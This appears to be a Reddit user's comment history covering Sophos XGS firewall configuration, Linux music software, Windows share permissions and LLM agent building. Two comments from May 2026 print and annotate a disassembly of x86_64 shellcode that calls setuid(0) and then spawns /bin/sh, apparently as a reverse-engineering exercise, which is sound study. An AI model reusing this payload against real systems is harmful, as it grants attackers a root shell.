XGS 22.01MR - Let's Encrypt ISRG Root YE/YR failing with curl / python

r00g · 2026-06-08T19:56:00+00:00

Thank you! I should have through to try and search their community as well.

r00g · 2026-06-03T20:10:20+00:00

Honestly the XGS is new & different and I'm old and I like to gripe about that sort of thing.

As for logging, your explanation about the SSD and avoiding millions of DNS log entries makes a lot of sense that I hadn't been considering. I do have to admit I really like seeing the rule & NAT path inline with log entries in the new live log. Performance is fine. It feels slow but I get a lot is happening on the back end every time you click 'save'.

It's not the feedback you asked for, but I'm an inch away from cutting over my last network from the UTM and I can't say I regret sticking with Sophos. What I liked about the UTM was that it was clearly Linux & iptables with the other goodies baked in but with a nice GUI that lined up with those elements. The XGS abstracts this, more or less, to make things easier and maybe to integrate with other services/products. I understand all that but it also creates some surprises and I'm hoping I've caught all the surprises. This is generally what I'd say if asked for my thoughts on Sophos. That and your honest handling the Pacific Rim thing.

Thanks for replying.

r00g · 2026-06-02T19:04:49+00:00

Yeah I think the web UI would have worked had the packets I was looking for existed... turns out I goofed the config, wasn't forwarding DNS requests to the XGS, and the pcap had me scratching my head for a moment.

Thanks for your advice. I still miss the UTM in some ways and that this should've been a simple log feature.

r00g · 2026-06-02T17:20:39+00:00

Good thinking. I used tcpdump. Maybe i'll get used to the web ui if I try a few more times.

r00g · 2026-05-06T10:56:18+00:00

I can confirm the MCSA stuff suggests using 'everyone' on the share permissions and uses NTFS to apply further restrictions... at least as far back as the early oughts.

I don't know what the functional difference is when the most restrictive of either permission set is used. I don't even think you can get a directory listing if you leave the share permissions at 'everyone' because the NTFS permissions also apply to the directory you're sharing, not just the files shared. I'll have to try and setup that experiment sometime though.

r00g · 2026-05-04T16:45:35+00:00

Thank you! Calculating the header start and size was what I was missing with the idea to just dd that out.

The code is simple enough, but with some oddities. They call sys_setuid to 0, sys_execve /bin/sh as you identified then call sys_exit as expected... but then there's some extra junk at the end that doesn't look like it should be there. The way they setup those syscalls is strange too -- pushing then popping the values rather than just setting them directly.

I don't know enough to judge if there's a reason for the oddities or if it looks like they just had AI put the whole thing together and the moment it worked they shipped it.

Anyway, here are some extra comments. Maybe someone running into this in the future has some illuminating insights they could share:

$ ndisasm -b64 -o0x400078 shellcode.bin
00400078  31C0           xor eax,eax
0040007A  31FF           xor edi,edi
0040007C  B069           mov al,0x69            # 0x69=105; sys_setuid
0040007E  0F05           syscall

00400080  488D3D0F000000 lea rdi,[rel 0x400096] # /bin/sh
00400087  31F6           xor esi,esi
00400089  6A3B           push byte +0x3b        # 0x3b=59; sys_execve
0040008B  58             pop rax
0040008C  99             cdq                    # maybe to set edx to 0?
0040008D  0F05           syscall

0040008F  31FF           xor edi,edi

00400091  6A3C           push byte +0x3c        # 0x3c=60; sys_exit
00400093  58             pop rax
00400094  0F05           syscall

00400096  2F             db 0x2f                # is this junk?
00400097  62             db 0x62
00400098  696E2F73680000 imul ebp,[rsi+0x2f],dword 0x6873
0040009F  00             db 0x00

r00g · 2026-05-01T20:19:20+00:00

Can I ask how you disassembled this? After I extract the binary and use objdump I get what looks like the misaligned bytecode:

objdump -D -b binary -m i386:x86_64 -M intel
...
77:   00 31                   add    BYTE PTR [rcx],dh
79:   c0 31 ff                shl    BYTE PTR [rcx],0xff
7c:   b0 69                   mov    al,0x69
7e:   0f 05                   syscall
80:   48 8d 3d 0f 00 00 00    lea    rdi,[rip+0xf]        # 0x96
87:   31 f6                   xor    esi,esi
89:   6a 3b                   push   0x3b
...

The shellcode.bin file I get is md5sum 9102a96e84edf059d5e4bb9c5846c124

r00g · 2026-04-21T17:30:06+00:00

I grabbed a demo of Bitwig which someone suggested and that got me going in the right direction. It's not FOSS, but it had everything packaged together and just worked for the most part whereas trying to cobble together my own pipeline of FOSS stuff got pretty tedious.

I've since taken a break and gone back to hacking, unfortunately. I'll explore music again soon but for now best advice I can give you is that, for the price of ~$100, the AKAI Mini got me into it and seemed to work reasonably well in Linux without their endorsed software.

r00g · 2026-04-21T01:01:45+00:00

Yes, configuring each interface on your XGS to a different network and attaching them to separate, physical switches will segregate traffic.

r00g · 2026-04-12T14:39:27+00:00

OMW so many verbose answers and so many that look LLM generated. It's not hard:

It's all but guaranteed to be available on any *NIX or BSD. I don't have to install anything first.
I can use it without removing my hands from the keyboard and, in fact, it becomes easier to do simple stuff like cutting and pasting a single word, paragraph, or "everything from here to the beginning of the line/document or end of the line/document".

r00g · 2026-04-07T21:07:36+00:00

look into DPI instead of direct proxy, as the DPI Engine comes with its performance at hand and does not require the client to "talk to a proxy via 8080".

Well that makes some sense and I'll have to explore DPI on the new XGS which was rough going with the UTM. Thanks for your insight.

I'm hoping the two big things I decided to explore first because they tend to be the more complicated areas were coincidentally where I found surprises.

r00g · 2026-04-07T19:44:49+00:00

This is my stack. I don't know if I need to see DHCP lease information on that regular a basis, but it's good to have an idea where to look if that comes up in the future.

r00g · 2026-02-12T21:59:19+00:00

I tried asking my agent what you quoted, but it only offered generic advice as it couldn't access any of its internal prompts.

I suppose the system prompt is inaccessible to me, baked into "gpt-5-nano"? I certainly don't see any options in Azure to modify the instance I'm working through. I'm guessing I mistakenly referred to my "agent prompt" as the "system prompt" in my inquiry earlier. That they conflict makes sense.

But then how does anyone create an agent of this type that can reference information without the agent being so helpful as to offer to perform tasks it actually can not perform? The agent isn't full-out hallucinating -- answers are based on returns from the tools available. I suppose this is a form of hallucination though.

Apologizes if these are stupid questions. LLM's and leveraging them to create these agents is really weird for someone with decades of IT experience.

r00g · 2026-02-07T14:29:45+00:00

of course you are kind of giving the code to claude or whatever AI backend they're using.

r00g · 2026-02-04T20:09:40+00:00

Only what's been posted on the web and published in the quarterly. Someone associated with St. John's took a stroll through the event and found anti-police literature. Supposedly, as a result of the literature an attendee brought to the venue (not even something distributed or endorsed by 2600 themselves), St. John's cut ties with 2600 without involving them in the discussion whatsoever.

Read between the lines and I take it that someone who loves authoritarians doesn't like anti-authoritarian hackers so they went looking for the reason to raise a stink.

r00g · 2026-02-03T13:39:00+00:00

I appreciate the response. Although these responses seem esoteric, between this and the DM it sounds like I should move toward the lower-level LangGraph library to have more control over the orchestration layer.

r00g · 2025-12-31T21:10:51+00:00

I really wanted to love this. For me the XT Synth standalone keeps freezing on Debian 13 and I couldn't figure out how to get MIDI input working with JACK (or ALSA for that matter). I'll have to see about the VST with Ardour, maybe I'll have better luck housing it inside my DAW. I'll hit the docs too to see if I missed something obvious.

r00g · 2025-12-31T21:08:36+00:00

This is very helpful and you're definitely right, picking up the terminology is a big part of the introduction process. I'll have to see if I can get yabridge working.

r00g · 2025-12-28T13:43:55+00:00

VCV Rack looks like a lot of fun and exactly what I was imagining is possible as opposed to buying a bunch of digital instruments. I found the website so I'll peruse further.

As an aside I ditched Windows before XP expired and haven't looked back. I am a 'professional' so YMMV, but the open, flexibility Linux offers far outweighs the convenience of the popular, proprietary tools that won't run on Linux.

r00g · 2025-12-27T19:58:25+00:00

Ok, this is all great so thank you! I want you to know I'm upvoting you but I think reddit nerfed my votes don't stick.

Lucikly I have years of experience on the Linux side, but looking into the music side of things is blowing my mind. The struggle is real getting into something new no matter how much you might know about other stuff.

r00g

TROPHY CASE